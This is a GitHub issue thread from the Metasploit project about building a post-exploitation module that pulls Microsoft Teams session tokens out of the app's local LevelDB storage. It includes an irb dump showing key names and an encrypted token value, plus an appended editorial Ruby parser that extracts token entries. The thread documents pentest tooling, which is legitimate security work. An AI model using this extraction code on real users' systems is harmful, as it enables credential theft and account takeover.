rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Microsoft Teams Authenticated Cookie post module #17144

Open h00die opened 1 year ago

h00die commented 1 year ago

Summary

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

From the article: "In August 2022, the Vectra Protect team identified a post-exploitation opportunity allowing malicious actors with sufficient local or remote file system access to steal valid user credentials from Microsoft Teams due to their plaintext storage on disk. This plaintext credential management was determined to impact all commercial and GCC Desktop Teams clients for Windows, Mac, and Linux."

Microsoft Teams has a SQLite database which contains a valid cookie for a Teams user. The article lays out how to retrieve it, where they are, etc. Feels like a pretty good and easy post module.

cn-kali-team commented 1 year ago

If Ruby has a library to parse LevelDB, I can complete this module.

h00die commented 1 year ago

Looking like 3 options; the first 2 are 9+ years old, so who knows if they work.

cn-kali-team commented 1 year ago

I'm now ready to write a module for Electron. It should be able to extract cookies and data saved in localStorage.

cn-kali-team commented 1 year ago

https://github.com/DAddYE/leveldb

```
irb(main):002:0> require 'leveldb'
/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `initialize': wrong number of arguments (given 5, expected 3..4) (ArgumentError)
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `new'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/fiddler-rb-0.1.2/lib/fiddler.rb:51:in `cdef'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:12:in `<module:Native>'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:4:in `<module:LevelDB>'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/native.rb:3:in `<top (required)>'
        from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/leveldb-0.1.9/lib/leveldb.rb:1:in `<top (required)>'
        from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from <internal:/home/kali-team/.rbenv/versions/3.0.2/lib/ruby/3.0.0/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from (irb):2:in `<main>'
        from /home/kali-team/.rbenv/versions/3.0.2/lib/ruby/gems/3.0.0/gems/irb-1.4.3/exe/irb:11:in `<top (required)>'
        from /home/kali-team/.rbenv/versions/3.0.2/bin/irb:23:in `load'
        from /home/kali-team/.rbenv/versions/3.0.2/bin/irb:23:in `<main>'
```

cn-kali-team commented 1 year ago

Unfortunately, the Skype certificate I got in the latest version of the test has been encrypted. If I want to complete this module, it may take more time to reverse engineer.

```
➜  metasploit-framework git:(MicrosoftTeams) ✗ irb
irb(main):001:0> require 'leveldb-native'
=> true
irb(main):002:0> db = LevelDBNative::DB.new '/home/kali-team/VD/Teams/Local Storage/leveldb/'
=> <LevelDBNative::DB "/home/kali-team/VD/Teams/Local Storage/leveldb/">
irb(main):003:0> db.keys
=>
["META:https://teams.microsoft.com",
 "VERSION",
 "_https://teams.microsoft.com\x00\x01isEncryptionKeySet",
 "_https://teams.microsoft.com\x00\x01ts.TS_ADDITIONAL_SETTINGS",
 "_https://teams.microsoft.com\x00\x01ts.TS_OVERRIDE_SETTINGS",
 "_https://teams.microsoft.com\x00\x01ts.appliedActiveTheme",
 "_https://teams.microsoft.com\x00\x01ts.cdlSharedWorkerJsUrl",
 "_https://teams.microsoft.com\x00\x01ts.cdlWorkerType",
 "_https://teams.microsoft.com\x00\x01ts.enableSetRegionCookieTenantSwitchGcctoAnyRegV2",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.CallingDropsCollectorService:CallEntries",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.Teamspace.Search.Recent",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache-status-data",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache.token.https://api.spaces.skype.com",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.currentConversationTableVersion",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.currentConversationVersion",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.enableDataLayerWorkerMessaging",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.enableStartupUsingPartialData",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.ss.navigationIndex",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.ss.navigationStack",
 "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.useReplyChainStoreV2",
 "_https://teams.microsoft.com\x00\x01ts.indexDbs",
 "_https://teams.microsoft.com\x00\x01ts.latestOid",
 "_https://teams.microsoft.com\x00\x01ts.nonLoggedInUserLocation",
 "_https://teams.microsoft.com\x00\x01ts.openDbs",
 "_https://teams.microsoft.com\x00\x01ts.previousSessionLogs",
 "_https://teams.microsoft.com\x00\x01ts.puid",
 "_https://teams.microsoft.com\x00\x01ts.tenantList_0003BFFD09DBD369",
 "_https://teams.microsoft.com\x00\x01ts.upgradeV2Themes",
 "_https://teams.microsoft.com\x00\x01ts.userInfo"]
irb(main):004:0> db.get("_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache.token.https://api.spaces.skype.com")
=> "\x01{\"token\":\"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\",\"aud\":\"https://api.spaces.skype.com\",\"expiration\":1671439042,\"isEncrypted\":true}"
```
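The key and value layout in the dump above is Chromium's localStorage-on-LevelDB encoding: a storage key is `"_" + origin + "\x00" + format byte + key`, and every value starts with the same one-byte format marker (`\x00` for UTF-16LE, `\x01` for Latin-1). The `cache.token.*` entry is then a JSON document with `token`, `aud`, `expiration` and `isEncrypted`. The following Ruby module is an added example written for this editorial pass; it is neither code from the thread nor from Metasploit. It takes the records as a Hash of raw key to raw value (what `db.keys` and `db.get` from the session would supply), decodes the format byte, and returns the token entries together with their audience, expiry state and whether the `isEncrypted` flag is set, which is the case cn-kali-team ran into. The sample records, the token string, the module name and the method names are all constructed for the example; the format-byte semantics and key layout are Chromium's.

```ruby
require 'json'

# Parser for Teams token entries stored in Chromium's localStorage LevelDB.
# Key layout: "_" + origin + "\x00" + format_byte + storage_key
# Value layout: format_byte + payload, where 0x00 = UTF-16LE and 0x01 = Latin-1.
module TeamsLocalStorage
  TOKEN_MARKER = '.cache.token.'.freeze
  OID_PATTERN = /\Ats\.([0-9a-f-]{36})-msaDefaultOid\./.freeze

  # Constructed sample records in the same shape as the irb dump above.
  # The token is a placeholder, not a real credential.
  SAMPLE_RECORDS = {
    'META:https://teams.microsoft.com'.b => "\x01{}".b,
    'VERSION'.b => '1'.b,
    "_https://teams.microsoft.com\x00\x01ts.latestOid".b =>
      "\x01f8cdef31-a31e-4b4a-93e4-5f571e91255a".b,
    "_https://teams.microsoft.com\x00\x01ts.f8cdef31-a31e-4b4a-93e4-5f571e91255a-msaDefaultOid.cache.token.https://api.spaces.skype.com".b =>
      "\x01{\"token\":\"CONSTRUCTED_FAKE_TOKEN\",\"aud\":\"https://api.spaces.skype.com\",\"expiration\":1671439042,\"isEncrypted\":true}".b
  }.freeze

  # Decode a format-byte-prefixed Chromium localStorage string to UTF-8.
  def self.decode(blob)
    return '' if blob.nil? || blob.empty?

    fmt = blob.getbyte(0)
    body = blob.byteslice(1..-1) || ''.b
    case fmt
    when 0x00 then body.force_encoding(Encoding::UTF_16LE).encode(Encoding::UTF_8)
    when 0x01 then body.force_encoding(Encoding::ISO_8859_1).encode(Encoding::UTF_8)
    else raise ArgumentError, format('unknown localStorage format byte 0x%02x', fmt)
    end
  end

  # Split a raw LevelDB key into [origin, storage_key].
  # Returns nil for META:/VERSION bookkeeping entries that carry no "_" prefix.
  def self.parse_key(raw)
    return nil unless raw.start_with?('_')

    origin, rest = raw[1..-1].split("\x00", 2)
    return nil if rest.nil?

    [origin.dup.force_encoding(Encoding::UTF_8), decode(rest)]
  end

  # Walk the records and return one Hash per cache.token.* entry.
  # `now` is injectable so expiry can be evaluated against a fixed clock.
  def self.extract_tokens(records, now: Time.now)
    records.each_with_object([]) do |(raw_key, raw_value), out|
      parsed = parse_key(raw_key)
      next if parsed.nil?

      origin, key = parsed
      next unless key.include?(TOKEN_MARKER)

      begin
        doc = JSON.parse(decode(raw_value))
      rescue JSON::ParserError, EncodingError
        next # malformed entry; skip rather than abort the whole dump
      end

      exp = doc['expiration']
      out << {
        origin: origin,
        oid: key[OID_PATTERN, 1],          # user object id embedded in the key
        aud: doc['aud'],
        expiration: exp,
        expired: exp.is_a?(Integer) && Time.at(exp) < now,
        encrypted: doc['isEncrypted'] == true, # true means the token field is ciphertext
        token: doc['token']
      }
    end
  end
end

if $PROGRAM_NAME == __FILE__
  # With the leveldb-native gem from the session, real records would be built as
  #   records = db.keys.to_h { |k| [k, db.get(k)] }
  TeamsLocalStorage.extract_tokens(TeamsLocalStorage::SAMPLE_RECORDS).each do |t|
    puts "#{t[:origin]} oid=#{t[:oid]} aud=#{t[:aud]} expired=#{t[:expired]} encrypted=#{t[:encrypted]}"
  end
end
```

An `encrypted: true` result means the `token` field is not usable as-is, which is exactly what the last comment reports; a module would need to treat such entries as evidence of a logged-in session rather than as a harvested credential.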